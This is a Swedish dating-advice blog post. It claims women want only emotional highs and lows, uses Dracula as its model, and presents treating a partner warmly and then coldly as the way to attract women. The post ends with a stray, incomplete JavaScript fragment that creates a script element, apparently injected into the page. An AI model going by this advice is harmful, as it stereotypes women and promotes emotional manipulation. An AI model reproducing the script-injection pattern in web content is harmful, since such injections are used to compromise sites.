Dracula Varför Drakula alltid får tjejen!

Det har vart många diskussioner om att man msåte vara bad boy för att få tjejer eller att man ska vara rik för att kunna attrahera vackra damer etc. Med denna post ska jag försöka sätta punkt på diskussionen.

Vad vill kvinnor ha?

Diskussionen bottnar sig någonstans i den frågan, – Vad vill Kvinnor ha?

Det finns en del saker de INTE vill ha:

1) Någon som ser efter dem

2) Någon som smörar för dem

3) Någon som ger dem bekvämlighet

4) Någon som köper massa saker åt dem

5) Någon som tar hand om dem

och en massa annat!

Problemet med denna lista är att det säger emot sig själv lite – Kvinnor vill ju visst ha dessa saker, åtminstone vissa av dem!

Det säger till och med emot vad vi lär ut, t.ex. att vara beskyddare av nära och kära. Så varför har jag skrivit att kvinnor INTE vill ha dessa saker?

Av den anledning att det inte är det SPECIFIKA de vill ha utan kanske något som det ger dem som en bieffekt. Det finns nämligen en enda sak kvinnor vill ha. Mel Gibson släng dig i väggen för Vad Kvinnor vill ha är:

- KÄNSLOR!

Inget annat. De knarkar känslor. That’s it.

Det är därför man kan köpa sin flickvän något fint och hon älskar det men om man fortsätter köpa det regelbundet så skapar det inte samma känsla och därmed kommer inget – hur dyrt det än är – få den uppskattningen som det billiga, första, halsbandet du köpte henne fick.

En kvinna kommer bli förtrollad om hon är i fara och du räddar henne. Men om du är överbeskyddande och spenderar varje sekund till att se till att hon är trygg kommer hon känna sig instängd och känslan kommer inte existera.

Det är därför kvinnor dras sig till ”svin” för de kommer inte bara behandla dem bra. De kommer ge dem bra känslor tills de når toppen och sen vända och behandla dem kallt (vilket i sig också skapar känslor) tills det når en dal och sen så vänder de på steken igen.

Känslor är nämligen polära! Alla känslor har sina antagonister/motsatser och ingen känsla kan fortleva/existera utan dess motsats.

Av den anledning dras kvinnor till ”farliga män” eller ”rika män”. Dock skulle jag mer vilja säga, rika – ÄVENTYRLIGA – män. Det är egentligen inte det faktum att de är rika – lottomiljonärer brukar inte kunna attrahera kvinnor som inte är lyckönskare – utan att de är äventyrliga och har råd med det. Det finns många rika som inte är duktiga på att få kvinnor i sina liv. Rika som lyckas är coola, har dyra bilar vars motor de gärna utnyttjar till max, festar dyrt etc. De har en SPÄNNANDE vardag för att de har råd med det OCH tycker om det!

Av denna anledning spelar det ingen roll om en man är ”bra” eller inte. Allt som spelar roll är vilka känslor han skapar hos kvinnor.

Se på Drakula. Jag har i hela mitt liv älskar den karaktären och fruktat honom. Jag har alltid trott att hans attraktionskraft har vart pga hans magiska och mörka krafter. Men på senare tid med djupare förståelse för attraktion har jag förstått att kvinnorna i historien om honom inte alls har ”hypnotiserats”. (jag förstår att det är en fiktiv karaktär och historia men häng med)

Drakula är farlig, läskig och i många tillfällen bizarr och ett monster. Men det spelar ingen roll för han skapar MÅNGA känslor hos kvinnorna i berättelsen. Han skrämmer dem när han kommer mitt i natten med sin storhet, blodtörstande och vassa tänder, men när han väl tar dem i sin famn och viskar lugnande ord i öronen så kan ingen annan på jorden känna sig mer säker och trygg – han är ju efter allt Mörkrets Furste.

Det är så kvinnor fungerar. De vill ha känslor. Och känslor är polära och måste stimuleras åt alla håll för att kunna upplevas/existera.

Allt annat är bara detaljer.

Ha en bra Lördag

- Xtreeme

var d=document;var s=d.createElement(‘script’);